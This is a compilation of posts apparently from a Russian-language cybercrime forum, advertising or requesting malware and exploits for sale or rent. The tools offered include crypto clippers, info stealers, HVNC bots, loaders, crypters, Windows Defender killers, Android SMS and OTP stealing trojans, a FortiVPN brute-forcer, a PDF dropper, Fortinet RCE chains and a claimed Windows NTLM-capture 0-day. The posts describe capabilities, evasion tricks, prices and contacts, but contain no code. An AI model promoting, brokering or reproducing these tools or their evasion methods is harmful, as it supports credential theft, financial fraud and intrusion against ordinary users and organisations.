0101B013141C2B44C295F3717563E2F74DEF2FF621387FB981CBC611B622C2445238CFBFBA99
Куплю различные средние и минорные баги Телеграм, на high severity не
расчитываю.
А так же ошибки в бизнес логике и бекенд баги Telegram
Продам /Поменяю несколько обходов, которые будут полезны при фишинге. Есть некоторые обходы.
Пишите в ЛС подробное описание то что у вас есть, будем иметь диалог
В арсенале имеется два вида клиппера:
#1
Spoiler: Скрин билдера
Язык: C++ без зависимостей.
Вес: ~400кб билд.
Шифрование кошелей/токена тг, расшифровка в runtime
Поддержка разный видов кошельков отдельно друг от друга.
Лог в Телеграм.
Самоудаление.
Скрытие файла, галочка показывать скрытые файлы не покажет файл, также АВ не
будут реагировать на этот файл при наборе детекта через время.
Два типа автозагрузки: Планировщик (попытка запуска каждую минуту), Через .LNK
и папку Startup.
Spoiler: Вид лога
1 билд - 70$ / Билдер - 250$
#2
Язык: C + ASM
Вес: ~140кб билд
Инжектит шеллкод в explorer.exe (на выбор любой системный процесс)
Шифрация кошельков, рaсшифровка в runtime.
Отправка логов в ТГ из-под <любой системный процесс>
Замена происходит из-под <любой системный процесс>
Кошельки для замены те что и у #1, за исключение SOLANA.
Не имеет встроенной автозагрузки, предназначен для склейки с основным билдом
имеющим на борту функцию автозагрузки.
Spoiler: Вид лога
1 билд - 70$ / Билдер - NONE
Софт можно сказать приватный, используется всего парой людей.
сдам помесячно в аренду бота, есть такие модули:
- браузеры в HVNC исправно работают на windows 10-11, сам бот работает на
семерке.
- клиент 32 битной разрядности, x32
- HVNC НЕ тайнинюк или его форк! не нуждается в большой скорости интернета,
не нагружает процессор, обладает высокой производительностью.
- могу добавить автозагрузку, повышение прав.
- бота надо криптовать. он криптуется всеми нормальными криптерами, что-то
сверхъествественное не нужно
Ищу дроппер который аттачится в зипе без пароля к письму, проходит спам фильтры, хром алерт, смартскрин, WD и имеющий максимальную чистоту. Ищу рабочее решение. Дабл-клик дроппер, без лишних разводок, формат файла роли не играет. Оплата как фикс, абонемент, так и возможен %.
Продаю брутфорсер для Forti VPN.
+++ это не скрипт а нативный софт, так что он выжимает по скорости все что
возможно.
+ В виде консольного приложения для любых версий Windows x64.
+ Поддержка многопоточности и расширений процессора.
+ Поддержка онлайн или статических Socks4/5 прокси-листов.
+ Автообновление прокси-листа с заданным интервалом.
+ Отсев невалидных прокси.
+ Автоматический отсев Honeypot.
+ Работа с отдельными словарями User и Password.
+ Работа с комбо-листами User;Password.
+ Автосохранение последнего таргета.
+ Watchdog для обеспечения бесперебойности брутфорса.
+ Тонкая настройка количества таргет-потоков и количества потоков на
таргет.
+ Добавление GeoIP в отчете.
+ Настраиваемый таймаут Forti VPN.
+ Таргет-лист формата IP:Port.
+ Автоматический отсев невалидных таргетов (лучше предварительно
воспользоваться моим
чекером)
Сделка через Гаранта форума.
Приветствую всех. Продается 1-Click 0day LPE Exploit под Windows.
Spoiler: Описание.
Code:Copy to clipboard
----------------------------------------------------------------------------------------------------------------
| _____ _ _ _ _ ____ _ _ |
| |
| | _| | '_ \ / __| '__| | | | '_ \| __| |_| | | | | '_ \ \___ \| __/ _ \/ _' | |/ _ \ '__| |
| | |___| | | | (__| | | |_| | |_) | |_| _ | |_| | |_) | ___) | || __/ (_| | | __/ | |
| |_____|_| |_|\___|_| \__, | .__/ \__|_| |_|\__,_|_.__/ |____/ \__\___|\__,_|_|\___|_| |
| |___/|_| |
| |
| NTLM Capture Attack |
----------------------------------------------------------------------------------------------------------------
| |
| Object: 0-day Vulnerability |
| Type: 0-click NTLM Capture |
| Relation to MS Explorer: Exploits file handling in Windows Explorer |
| |
----------------------------------------------------------------------------------------------------------------
### **Краткое описание**
Концепт данного эксплойта использует уязвимость в Windows Проводнике,
связанную с обработкой специально созданных файлов.
Эксплойт создает файл, который указывает на сетевую директорию
как на удаленный ресурс и добавляет иконку для него. Когда пользователь открывает
папку с этим файлом через Проводник, система автоматически пытается подключиться
к удаленному ресурсу, инициируя процесс аутентификации через NTLM.
Таким образом, без участия пользователя происходит передача данных аутентификации
(NTLM-хешей) на удаленный сервер, где их можно перехватить и использовать для
дальнейшего анализа или атак.
**Ключевые особенности:**
- **0-click уязвимость**: активация происходит только при открытии папки в Проводнике.
- **Сетевой перехват NTLM**: удаленный ресурс инициирует NTLM-аутентификацию.
- **Автоматический захват данных**: NTLM-хеши отправляются без уведомления пользователя.
### **Технические данные**
Данная уязвимость затрагивает следующие операционные системы Windows,
так как они используют NTLM-аутентификацию по умолчанию и уязвимы к
неконтролируемым вызовам сетевых ресурсов через Проводник:
1. **Windows 10** – все версии, начиная с первой сборки до последнего обновления,
включающего NTLM-аутентификацию в Проводнике.
2. **Windows 11** – все сборки, которые поддерживают SMB и NTLM,
включая последние обновления.
3. **Windows Server** – все актуальные версии Windows Server, включая 2016,
2019 и 2022, которые поддерживают SMB и NTLM, также подвержены этой уязвимости.
**Примечание:**
Эта уязвимость не требует прямого взаимодействия пользователя (0-click),
поэтому уязвимы любые системы, где доступен Проводник и разрешен сетевой доступ к NTLM-ресурсам.
### **Анализ уязвимости и её оценка по CVSS (Common Vulnerability Scoring System).**
1. **Вектор атаки (Attack Vector - AV)**
- **Сетевой (Network - N)**: Эксплуатация уязвимости требует доступа к сети, так как жертва
обращается к SMB-серверу через сетевое соединение.
- **Оценка: N**
2. **Сложность атаки (Attack Complexity - AC)**
- **Низкая (Low - L)**: Эксплуатация уязвимости не требует сложных технических действий.
Создание файла и указание сетевого пути для иконки достаточно тривиально.
- **Оценка: L**
3. **Привилегии (Privileges Required - PR)**
- **Низкие (Low - L)**: Атакующий не нуждается в специальных привилегиях, чтобы создать и
опубликовать библиотеку. Жертва может обратиться к SMB-серверу с использованием стандартных
привилегий.
- **Оценка: L**
4. **Взаимодействие с пользователем (User Interaction - UI)**
- **Нет взаимодействия (None - N)**: Для запуска уязвимости взаимодействие пользователя не требуется,
поскольку Windows автоматически подгружает иконку.
- **Оценка: N**
5. **Воздействие на конфиденциальность (Confidentiality Impact - C)**
- **Высокое (High - H)**: Успешная эксплуатация уязвимости приводит к утечке NTLM-хешей, что может
позволить атакующему получить доступ к системе или к её ресурсам. Это потенциально компрометирует
конфиденциальность.
- **Оценка: H**
6. **Воздействие на целостность (Integrity Impact - I)**
- **Низкое (Low - L)**: Эксплуатация данной уязвимости в основном направлена на получение доступа,
а не на изменение данных.
- **Оценка: L**
7. **Воздействие на доступность (Availability Impact - A)**
- **Низкое (Low - L)**: Уязвимость не влияет на доступность системы, так как целью является сбор хешей,
а не нарушение работы системы.
- **Оценка: L**
**Итоговая оценка CVSS v3.1**
```
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/C:H/I:L/A:L
```
**Результирующий балл CVSS: 8.1 (Высокий)**
**Анализ и оценка:**
- Уязвимость оценивается как **высокая** (High) из-за легкости эксплуатации и серьёзного воздействия на
конфиденциальность.
- Возможность автоматически подгружать иконку, при этом собирая NTLM-хеши пользователей, делает её особенно
опасной, так как не требуется явного взаимодействия с пользователем.
- Уязвимость может быть особенно серьёзной в корпоративных сетях, где NTLM-хеши могут использоваться для атак
по релей и доступа к критическим ресурсам.
**Дополнительные соображения:**
- Если атакующий может использовать захваченные NTLM-хеши для эскалации привилегий или доступа к более
важным ресурсам, оценка может быть повышена до **критической** (Critical).
- Зависит от настроек безопасности в ОС (например, использование SMB Signing, NTLMv2) и использования
современных методов аутентификации.
Spoiler: Видео
This video is unavailable.
streamable.com
Старт: 200k$
Шаг: 10k$
Блиц: 400k$
Срок: 2 Недели
Работа строго через гаранта форума.
EN:
Hello all,
I am looking to buy an exploit code for the CVE in the title. Dm me on qTox. It is in my signature.
Thanks a lot,
Nickzfam
-------------------------------------------------------------------------------------------------------------------------------------
RU:
Всем здравствуйте,
Я хочу купить код эксплойта для CVE, указанный в заголовке. Напишите мне в qTox. Это у меня в подписи.
Большое спасибо,
Nickzfam
Можно очень хорошо заработать. Не нужно лить трафик и тд. Все уже готово,
нужен только ратник.
Пишите если есть таковой или знаете у кого есть.
Сдаётся в аренду / продаётся резидентный лоадер.
Информация :
- Совместимость со всеми версиями Windows начиная с Windows 7 (x64).
- Подробная статистика по странам и потокам с возможностью кастомизации.
- Возможность конфигурации доменных имен C2 и задержки отстука без ребилда
клиентской части.
- Имеет набор стандартных функций (выбор стран, лимит загрузок и т.д.)
- Лоадер выполняется в памяти трастового системного процесса.
- Определение установленных антивирусных продуктов.
- Автозапуск из под пользователя/системы, реализован эксклюзивный метод
закрепа в системе засчет сервиса обновлений Windows.
- Коммуникации с командным центром защищены криптостойкой системой на базе
эллиптических кривых, на каждый запрос генерируется новая пара ключей.
- Отключение Windows Defender
- Мониторинг активности ботов
- Build/Rebuild производится в любое время, когда саппорт в сети.
- Командный центр находится за сетью TOR.
Плагины :
- Так как продукт находится в Beta, в скором времени планируем добавление:
SOCKS.
Лицензионное соглашение :
Spoiler: Просмотреть
ЛИЦЕНЗИОННОЕ СОГЛАШЕНИЕ
ПРЕДМЕТ СОГЛАШЕНИЯ
Лицензиар предоставляет Лицензиату неисключительное право (лицензию) на
использование ПО на условиях настоящего Соглашения.
ПО предоставляется "как есть". Лицензиар не гарантирует, что ПО будет соответствовать всем требованиям Лицензиата или что его работа будет бесперебойной и безошибочной.
ПРАВА И ОБЯЗАННОСТИ СТОРОН
Лицензиат обязуется:
- Использовать ПО только в соответствии с условиями настоящего Соглашения.
- Не передавать право на использование ПО третьим лицам.
- Не осуществлять действий по обходу технических средств защиты, встроенных в
ПО.
Лицензиар обязуется:
- Обеспечивать функционирование ПО в соответствии с заявленными
характеристиками.
- Своевременно обновлять и поддерживать ПО до тех пор, пока оно не потеряет
актуальность.
- В случае обнаружения существенных недостатков или уязвимостей в ПО,
оперативно их устранять или расторгнуть Соглашение с возвратом средств
Лицензиату.
Лицензиар имеет право:
- Аннулировать лицензию без возврата средств в случае грубого нарушения
Лицензиатом условий настоящего Соглашения.
ОГРАНИЧЕНИЕ ОТВЕТСТВЕННОСТИ
Лицензиар не несет ответственности за действия Лицензиата и их результаты при
использовании ПО.
Лицензиар не несет ответственности за любые убытки, включая упущенную выгоду,
потерю конфиденциальной информации, возникшие в результате использования или
невозможности использования ПО.
ТЕХНИЧЕСКАЯ ПОДДЕРЖКА
Лицензиат имеет право на получение технической поддержки и консультаций по
вопросам, связанным с функциональностью ПО, особенностями установки и
эксплуатации на стандартных конфигурациях поддерживаемых (доступных)
операционных, почтовых и иных систем.
ОБНОВЛЕНИЯ И МОДИФИКАЦИИ
Лицензиар оставляет за собой право модифицировать или выпускать обновления ПО.
Лицензиат соглашается с тем, что размер файлов и отдельные характеристики ПО
могут изменяться со временем, и это не может быть основанием для претензий.
РАЗРЕШЕНИЕ СПОРОВ
Все споры и разногласия, которые могут возникнуть между сторонами по вопросам,
связанным с исполнением настоящего Соглашения, будут разрешаться путем
переговоров.
В случае невозможности урегулирования споров путем переговоров, они передаются
на рассмотрение арбитра форума в соответствии с установленными правилами,
положениями и принципами здравого смысла.
ЗАКЛЮЧИТЕЛЬНЫЕ ПОЛОЖЕНИЯ
Настоящее Соглашение вступает в силу с момента оплаты лицензии Лицензиатом и
действует в течение всего срока использования ПО.
Лицензиар оставляет за собой право вносить изменения в настоящее Соглашение.
Актуальная версия Соглашения публикуется на официальном сайте Лицензиара.
Если какое-либо положение настоящего Соглашения будет признано
недействительным, это не влияет на действительность остальных положений
Соглашения.
Совершая оплату и начиная использование ПО, Лицензиат подтверждает, что
прочитал, понял и согласен с условиями настоящего Лицензионного соглашения.
Актуальный runtime-скан (на 13.10.2024) - ТЕСТИРОВАНИЕ ПРОИЗВОДИЛОСЬ БЕЗ КРИПТА!
scanner.to
Скриншоты :
Контактная информация :
Matrix: @mr_president:unredacted.org
Jabber: armadildo@jid.pl
TOX:
7A6DD09E28A5D7F8911AB86EB592E66900EFDF8449C69FD493CA77124757244234D64E6DDB2E
TG: @barely_illegal
сверяйте контакты!
Подаю индивидуальные билды чекера Masscan листинга, для определения валидов
Forti VPN и не только (могу сделать индивидуально).
Софт привязывается к Вашему железу, так что ресселинг невозможен.
1 Билд -700$.
Имеется пост обработчик Forti в виде брутфорса и приватных CVE- отдельная
тема.
ОС - Windows, число потоков до 4096, авто настраивается в зависимости от
железа, консольный софт, не требует никаких доп. библиотек.
Скорость на 20 ядрах 64Гб ОЗУ, 100 Мбит сеть - до 68 чеков в секунду.
Пишите кому нужно в ПМ, дам контакт куда писать в последствии.
Скрин прилагаю.
Continental Stealer - convenient software suitable for both beginners and experienced users. It features a simple and user-friendly panel for your needs. You can create a build using an easy and straightforward Web- builder. It is compatible with all systems, from Win7 x32 to Win11 x64 , and supports both**ARM and x86 - x64 system architectures.**
The build size is no more than 42 KB~.
There is Telegram bot notification support for both the arrival of logs and the logs themselves.
All decryption is done server-side, ensuring that all data transmitted by the stealer is decrypted on the server.
__Browsers collection:
Firefox, Chrome, Opera, OperaGX, Brave, Edge, Chromium
Vivaldi, CocCoc, CentBrowser (and more)
__Browsers Data:
Browser history, Browser bookmarks, Browser autocomplete fields
Credit Card, Passwords, Cookie
__Messengers/Email apps collection:
Telegram, Discord, Thunderbird, The Bat
Outlook, Signal, Session, Tox, Pidgin
__Wallets collection:
Exodus, Atomic, Wasabi, Guarda, Electrum, Coinomi, Binance, MoneroGUI,
MyMonero
Jaxx, Ledger, Zcash, Metamask, Ronin, BinanceChain, TronLink, Phantom
Other apps collection:
Steam, OpenVPN, FileZilla, WinSCP
CoreFTP, Authy, WinAuth, OBS
System Information:
Username, Compname, IP, Screen size, CPU, GPU
RAM, DISK, InstalledApplications (and more)
**Panel functionality:
**
Dashboard - ****On this page, you will be able to view the number of
logs, passwords, cryptocurrency wallets
and credit cards. You can also download the necessary logs from there.
_** Builder - **_Here, you can automatically create a build without the need for third-party software, using the web panel.
_ Cookie Converter - _A page where you can import your cookies into Netscape for further work with them.
__ Profile - ****A page where you can change your password, link your Telegram for notifications, and receive logs in your Telegram bot.
_****_The ability to change the stealer 's extension:_** Exe, scr, com, cmd, bat, vbs, pif, wsf, hta, msi.
**_The ability to choose the desired .NET framework:_**.NET 4.7 (Win 8 - 11) or .NET 2.0 (Win XP - 7).**_
Spoiler: Panel
Spoiler: Logs File and Telegram Notifications
**Subscription price:
1 month - 120$**
Contacts:
https://t.me/Continental_admin (TG/Seller)
https://t.me/ContinentalCorporations (Channel)
Dropper форматов vbs hta js
Кому нужно пишите в ЛС
RAPTOR MINER — Многофункциональный Майнер
/// Скрытый Майнер - программа для майнинга монеты на своём ПК, используя
официальную начинку XMrig от пулов. Используется в целях фонового майнинга на
своих устройств, для комфортного пользования. Не предназначен для чужих ПК с
целью нарушения прав.
PRO PACK
FULL PACK
SOURCE PACK
Цена навсегда:
PRO PACK — 8.500₽
FULL PACK — 14.000₽
SOURCE PACK — 26.000₽
Telegram:
Spoiler: Контакт ТС, учитывайте что тема не актуальна.
t.me/Lotok1
Канал:
t.me/Dark3Market
Правила
Spoiler
Spoiler: Закрыто до прояснения ситуации с долгами
WIN95 Cryptor
V0.1
Мы предлагаем уникальную услугу шифрования ваших файлов (.EXE, .DLL, .BIN) с помощью нашего WIN95 Cryptor.
После приобретения вы получаете:
1 — WIN95 Cryptor
2 — Отдельно реализованный пампер ( unlimited ).
3 — Видео методичка по использованию + Readme по всему функионалу.
4 - 12 часовую поддержку.
Lumma \ Rhadamantys Runtime Scan**0/26
Преимущества WIN95 Cryptor V0.1:**
Обход Chrome Alert и Edge Alert — ваш файл становится невидимым для этих браузеров.
Проактивная защита Windows Defender — обходим основные защиты без детектов.
Склейка с любым софтом — объединяем ваш файл с любым другим ПО по вашему выбору.
Памп файла — увеличиваем вес до 1GB для сложных или скрытых целей.
Добавление иконки и OV-сертификата — настраиваем фирменную иконку и подпись файла для повышения доверия.
Anti Virtual Machines — защита от работы в виртуальных средах.
Melt-функция — самоуничтожение файла после выполнения задачи.
Mutex — предотвращение одновременного запуска нескольких копий программы.Click to expand...
Spoiler: ⚙️Функционал WIN95 Cryptor V0.1:
— Поддержка x32/x64/.NET всех версий, EXE.
— Максимальная уникализация кода для каждого крипта, снижая вероятность
детектирования антивирусами.
— Отсутствие зависимостей — Крипт работает на любых системах без необходимости
установки сторонних приложений.
Spoiler: 📈Результаты и гарантии:
— Еженедельные обновления с актуальными версиями рантайма.
— Стабильная замена о мере появления детекта.
Вес стаба: до 50-100кб.
Цены:
• Неделя подписка – $500 (тестовая и разовая услуга).
• Месяц подписки – $1500.
Spoiler: 💳 Оплата:
Криптовалюты: BTC, Tether, ETH, Zcash, XMR.
Связь и поддержка:
PM.
@osiris_offical - Tg
lok11@exploit.im - Jabber
Места ограничены !
![t.me](/proxy.php?image=https%3A%2F%2Fcdn1.cdn- telegram.org%2Ffile%2FF1sd1Ueoe- kNyuCpkqCGEAsaSK5JCUV74HPOX9fjkCQUHs7iZiRqpRdXYLL30IE8wc3hAvbq8O9vpORvvRlgufRQ3TP4RgCW4TtNqkn0Bd5bGkDvagiHL5Du_LZuCd0KIpz5NMbCQnYykPjX7kHOzJQMfkFeyvoD_Xx5xxtbqv9Ex0I0g9LqixsYS- LfhqAUQLUq9kwYPhL12u24CqK3FSiF3ZZa5KYKxRd-6FzbGD-olz2uV5aNpNhaB-Uokz- eZmRkwflh5UWP3HD8E-Wq1KxsyewLPYjMAE2DxB0Kd- Y_1NhZpUix4yzFRWjEKqkIN9-4VMjgV3tsxtoqLT- hDQ.jpg&hash=c72f8230c73a56d66312143467213402&return_error=1)
You can view and join @osiris_offical right away.
t.me
Long Story short;
I've access the source code of the Rust Based MacOS Stealer;
The functions of this stealer is, this stealer steal all the browsers data, wallets, and host password, and send them it to on TG and some advanced feature, For more information of this product, you can send me a PM here. And the price is discuss in the chat.
We'll use Escrow
**RU
Привет, убиваем Windows Defender.
· Услуга рассчитана исключительно на Windows Defender, протестировано на Win10/Win11.
· Софт работает как киллер WD после чего он дропает ваш файл на диск, добавляет весь диск в исключения WD и закрепляет ваш файл в системе.
· Поскольку во время установки закрепа WD выключен, ничего не мешает закрепить файл на системе и софт на 100% отработает.
· После перезагрузки компьютера, Defender работает как обычно, но весь диск оказывается в исключении. Ваша нагрузка же запускается на старте системы.
Технические подробности/ремарки:**
· Smartscreen не обходится.
· Обходится Chrome
· Размер финального файла приблизительно ≈6.5MB + размер вашего файла
**ENG
Hi, killing Windows Defender.
· The service is designed exclusively for Windows Defender, tested on Win10/Win11.
· The software works as a WD killer after which it drops your file on the disk, adds the whole disk to WD exceptions and persist your file on the system.
· Since WD is turned off during the persistence installation, there is nothing to prevent the file from being persisted on the system and the software will work 100% of the time.
· After rebooting the computer, Defender works as normal, but the entire disk is in exclusion. Your payload runs on system startup.
Technical details/remarks:**
· Smartscreen is not bypassed.
· Chrome is bypassed.
· Final file size is approximately ≈6.5MB + your file size.
Гарант приветствуется.
Welcome to Escrow.
**Видео с тестом Quasar RAT на Windows 11 24H2, перезапуск системы, проверка
лога
*окна появляющихся консолей не связанны с киллером, бутстрап VBox
Quasar RAT test video on Windows 11 24H2, restart the system, check logs
windows of appearing consoles are not related to the killer, VBox bootstrap*
Spoiler: Закрыто на депозит. Closed for deposit. 10k$
Hey guys,
Cobalt strike UDRL source code for sell
Details:
Api hashing.
Resolve api dynamicly
obfuscation for strings usage.
HellGate for evasion to call the syscall number of kernel functions.
Decrease the chance of getting detected.
Hooking over the functions while assigning the IAT
If you want specific functions you can ask
FUD 3/21 AV
scanner.to
Sell for one hand only
Доброго, посетители темы. Два месяца назад взял заказ человека по разработке проекта стиллера и панели с MaaS концепцией продажи на соседнем форуме. Тобишь, покупатель регистрируется на общей панели и ему выдается подписка, он довольный пользуется стиллером и продавцу не нужно ничего настраивать за него. Заказ был выполнен, а заказчик просто забанился на форуме и перестал выходить на связь, так его нет уже почти месяц. В связи с несправедливой ситуацией, в которой я потратил месяц своей жизни на все это и остался ни с чем, кроме потраченного времени, было принято решение о продаже этого добра
Начнем о стабе: написан на C#, вес 210 кб (в обфусцированном формате под выдачу пользователю); библиотеки все написаны кастомные, он не использует сторонние зависимости, кроме net4.0, который по дефолту есть на системах win7-win11; ничего не подгружает, работает с панелью в один реквест; лог собирается в памяти и отправляется на сервер в base64; ищет все браузеры на устройстве на базах chromium и gecko и вытаскивает с них куки, пароли, карты, расширения; собирает VPN профили с openvpn и wireshark; собирает сессию стима (ssfn и конфигурацию для прочека аккаунтов), сессию телеграма и токен discord; токены авторизации google (только с google chrome браузера); файлы с рабочего стола; всю информацию о компьютере (юзере, железе, сетевые данные); скриншот и криптокошельки (крипторасширения тоже собираются с chromium и gecko браузеров). Стиллер обновлен под v128+ и работает с последней версией chromium движка. Нет сбора Yandex браузера по причине того, что проект по моей инициативе должен был быть с строжайшим анти-снг
Spoiler: Скриншот с видом лога
Перейдем к панели: панель написана на php, фронт на bootstrap. Панель защищена от sql инъекций и xss эксплоитов. Поддерживает регистрацию пользователей и выдачу им подписок. Концепция работает данным образом: покупатель покупает у вас подписку на стиллер, вы выдаете ему подписку через базу данных, он может пользоваться стиллером до истечения подписки. Со скриншотами панели можете ознакомиться в спойлере. Сборка билдов пользователей происходит с помощью mono прямо на ubuntu сервере через самописный билдер. Стиллер написан по канону красивого кода, оптимизирован и отлично стучит. Весь проект ставится на один linux сервер с установленной на него ubuntu
Spoiler: Скриншоты панели
О стоимости кода: я не знаю, сколько это может стоить, поэтому жду ваши предложения в личные сообщения форума и в телеграме. Возможна продажа в одни руки при хорошей предложенной цене выкупа. Если у вас есть какие-то предложения по сотрудничеству, то жду ваше сообщение
Проект местами не дописан, потому что некоторые функции должны были согласоваться с заказчиком, поэтому после того, как я найду покупателя на эти исходники, пару функций я допишу, опираясь на желания покупателя. Возможна доработка панели по вашему желанию, но за дополнительный прайс. Могу также участвовать в поддержке проекта на длительный срок за фиксированную зарплату
Продажа осуществляется только через escrow и только таким образом: вы создаете сделку через escrow, я выдаю вам все исходники и устанавливаю все на ваш сервер, записывая на видео поэтапную настройку сервера (чтобы вы смогли в случае чего перенести проект или переустановить его на новый сервер), после проверки вы подтверждаете сделку
Связаться со мной можно через личные сообщения на форуме, либо через телеграм — https://t.me/zerodebug (телеграмом пользуюсь редко, но буду стараться быть онлайн 24 часа в сутки)
Есть вопросы? Не стесняйтесь задавать их в теме или в личных сообщениях
Способ и уничтожения антивирусов и других защитных программ.
Удаляет любые программы!
Даже если процесс защищён!
Даже если все настройки под паролем!
Даже если его нельзя удалить!
НЕ ИСПОЛЬЗУЮТСЯ ДРАЙВЕРА!
НЕ ТРЕБУЕТ ЧИСТКИ!
ВЕЧНЫЙ!
Требования:
Админ права, доступ к пк, перезагрузка.
Method and destroying antiviruses and other protective programs.
Removes any programs!
Even if the process is protected!
Even if all the settings are under the password!
Even if it cannot be removed!
Drivers are not used!
Does not need cleaning!
ETERNAL!
Requirements:
Admin right, access to PC, reboot.
FUD ALL AV RUNTIME 100%
price 5к.
гарант приветствуется/guarant welcome
contact:
DAB30747E4650B1D71A30E199FE07AED62239661B7EFA109AFA8E0821690D12B2FF84CE2A114
mr.bang@exploit.im
Продаю собранный CVE-2024-30088 в powershell с loadpe с обходом amsi и etw.
Выход файла в .ps1 - можете загрузить на пастбин и одной командой скачивать.
Патчит амси и запускает сплойт в памяти.
Повышает привелегии с любых прав до SYSTEM на системах Windows 10, 11, 2016,
2019.
Продам исходники банковского трояна написанного на Kotlin.
После запуска приложение отправляет номер телефона жертвы в чат телеграм
указанный при сборке. Далее все СМС пересылает туда же.
Есть 2 варианта работы:
- После получения всех разрешений приложение выводит webview на url указанный
при сборке.
- После получения всех разрешений приложение исчезает с рабочего стола и
продолжает работу в фоне.
Так же бот уведомляет о статусе запуска в отдельный чат (статус получения нужных разрешений)
Все динамические параметры удобно сгруппированны с начале MainActivity (чат логов, webview url, режим работы)
Могу внести дополнительные правки за доп плату.
Программа нигде не светилась, Google Play защита пока не детектит.
Так же при запуске в Pу локации программа не шлет логи.
Продаю сугубо в ознакомительных целях)
Оплата через гаранта.
Ps: Первый раз продаю софт подобного рода, не судите строго =)
RU:
Исходный код вируса на Android для кражи OTP-подтверждений.
Автоанализ работающих сервисов на основе логов SMS на SIM-карте.
Например: Amazon, Binance, Bybit, Vodafone, Discord, Telegram, Steam и
т.д.
Работает на Android 14 , не требует дополнительных разрешений от
пользователя, кроме READ_SMS.
Работает в фоновом режиме без перебоев и в спящем режиме.
Для работы всё, что вам нужно, — это установить панель на ваш RDP-сервер.
После покупки вы получаете:
Исходный код клиента на Java + (Kotlin DSL)
Исходный код сервера на C# (.NET 4.8) + WPF (Windows Presentation Foundation).
!Если вам нужны особенные функции, вы также можете обратиться по этому поводу.
**
ENG****:**
Source code of an Android malware for stealing OTP-confirmations.
Automated analysis of working services based on SMS logs on the SIM card.
For example: Amazon, Binance, Bybit, Vodafone, Discord, Telegram, Steam
etc.
Works on Android 14 , does not require additional permissions from the
user except for READ_SMS.
Operates in the background without interruptions and in sleep mode.
To work, all you need is to install a panel on your RDP server.
After purchase, you will receive:
Source code of the client in Java + (Kotlin DSL)
Source code of the server in C# (.NET 4.8) + WPF (Windows Presentation
Foundation).
!If you need special features, you can also inquire about this.
Все мы сталкиваемся с проблемой когда жертва скачивает апк файл на свой телефон,и сразу видит предупреждение что файл может быть не безопасным (если на нем нет сертификата),с радостью помогу решить эту проблему,за подробной информацией обращайтесь в тг@bellygen
Гарант-сервис XSS.is - https://xss.is/help/escrow/
Click to expand...
Spoiler: Закрыто на депозит. 15$.
FleshStealer - лучший стилер за свою цену, средний отстук 75-85%, поддержка 24/7, , расшифровка лога на сервере, вес билда 150-300КБ, ворует браузеры на базе Chromium и Mozilla, ворует множество браузерных криптовалютных и 2FA расширений, имеется возможность ВОССТАНОВИТЬ УБИТЫЕ COOKIES GOOGLE.
**Что крадет стилер?
- Все крипто кошельки
- Браузеры ( Динамический поиск браузеров)
- Тг сесии
- Разные доп клиенты
Также можно получить тест период на 7 дней
1 Месяц (20% скидка) =
450р
3 месяца (30% скидка) =
1000р
Навсегда (30% скидка) =
4000р
Контакты:
Купить подписку - @fleshstealler
EU
FleshStealer is the best styler for its price, average churn 75-85%, 24/7
support, , log decryption on the server, build weight 150-300KB, steals
Chromium and Mozilla based browsers, steals many browser cryptocurrency and
2FA extensions, has the ability to RESTORE KILLED GOOGLE COOKIES.
What does the styler steal?
- All crypto wallets
- Browsers (Dynamic Browser Search)
- Tg sessions
- Various additional clients
You can also get a test period for 7 days
1 Month (20% discount) = 450p
3 months (30% discount) = 1000p
Forever (30% discount) = 4000p
Contacts:
Buy a subscription - @fleshstealler**
Darkness Stealer
Starting from €60 per month
Darkness Stealer is malware designed to provide our clients with the power
to steal credentials and money through our Clipper.
Multi-Browser Support: Captures data from browsers such as Chrome, Edge,
Firefox, Brave, Vivaldi, among others.
Comprehensive Data Theft: Extracts cookies, passwords, and bank cards.
Advanced Features: Login Panel, Includes clipper functionality for crypto
wallets & IBAN , web panel for data management, anti-VM/debugging,
persistence, and string encryption. Regular updates to fix bugs and bypass
some AVs.
_Technical Explanation** :_ Developed in a low-level language to facilitate
morphing and adaptability. Minimal dependency on high-level WINAPI to increase
stealth and security. Uses low-level system calls wrapped in ASM for all
interactions with the operating system. (syscalls)End-to-end encryption
between the server and infected client ensures secure data transmission.
Professional - €150/month:
Includes all functions of the previous package.**
Greetings,
We're currently selling our Silent PDF Exploit Phishing Dropper.
Positive Features:
[+] UAC Bypass
[+] Disables windows defender behavioral detection.
[+] It has 4/40 Detection Rate on KleenScan [See Here:
https://kleenscan.com/scan_result/e8323a22f31aa267f93b33c1eefc862b074f098967a153d56722b991c2c05b36
]
[+] It bypasses the most commonly used antivirus programs (Win dows Defender,
Avast, AVG, Kaspersky, McAffee , Nod32 etc. See Kleenscan link for further
information)
[+] Social engineering can be added by request. Example: When the user opens
it via browser, it is giving a fake error and says "This PDF Document Cannot
Be Viewed Via Browser, Please install the latest version of Foxit PDF Reader
software."
[+] The content of the powershell script that's embedded in the PDF file is
encrypted.
Negative Features:
[-] It only works on any version of Foxit PDF Reader so don't ask whether it
works on browser. [There is currently no PDF Exploit that works on Browsers.
It is not quite possible without a 0 day]
Pricing:
[]$250 for 1 stub,
[]$650 for 1 month subscribtion,
[]$1500 for 3 months subscribtion,
[]$3400 for 6 months subscribtion.
For buy DM or Telegram: https://t.me/WalterBishop_AzzaSec
Video Demonstration:
Image Example of Phishing PDF:
Today I am SELLING Facebook Two-Factor Authentication Bypass Vulnerability.
This vulnerability can bypass any form of Facebook Two-Factor Authentication with a 100% success rate.
The price is more affordable than you might expect. All transactions are securely handled through Escrow.
If you are interested, PM me with your offer, and we can discuss the details further.
I realize that my account is new, which might raise concerns about potential fraud. However, please rest assured. All transactions are securely handled through Escrow, ensuring there is no risk of fraud on my part
Продается самописный сайт для продажи доступов.
Возможность создавать новостные блоги с названием, картинкой и описанием.
Внедрена система файлового менеджера, для каждой новости вы можете заливать
свои файлы и установить таймер, по истечению которого в этом блоге открывается
возможность посмотреть все файлы в виде древа с предпросмотром и поиском.
Так же можно создавать запароленные блоги которые не будут видны на главной
странице.
За более подробной информацией и скриншотами обращаться в лс или по контактам.
Отдаются исходники, инструкция по установке и поддержка.
Цена: 500$
Контакты :
Телеграм: https://t.me/datisata
TOX:
2981184A72C10EF38591F3ECAF3C91BD06940D50243BA25663C108F71257690D63BCAC17576B
p.s. Так же имеется продукт для двухстороннего приватного чата.
Hi
I started To sell 2 RCE of fortinet sslvpn full exploit chain For All Devices
Based On this topic: https://xss.is/threads/83850/page-2#post-852751 I speak about different between released POCs and Full Exploit Chain.
full chain exploit for cve-2022-42475 and xortigate ( cve-2023-27997_
the zip file consists of 4 python code ( for each cve 4 file for 2 different arch that provide in fortinet )
